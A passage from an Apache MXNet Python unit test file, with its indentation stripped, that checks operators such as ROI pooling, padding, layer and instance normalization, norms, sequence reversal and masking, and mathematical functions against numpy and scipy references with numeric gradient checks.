with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
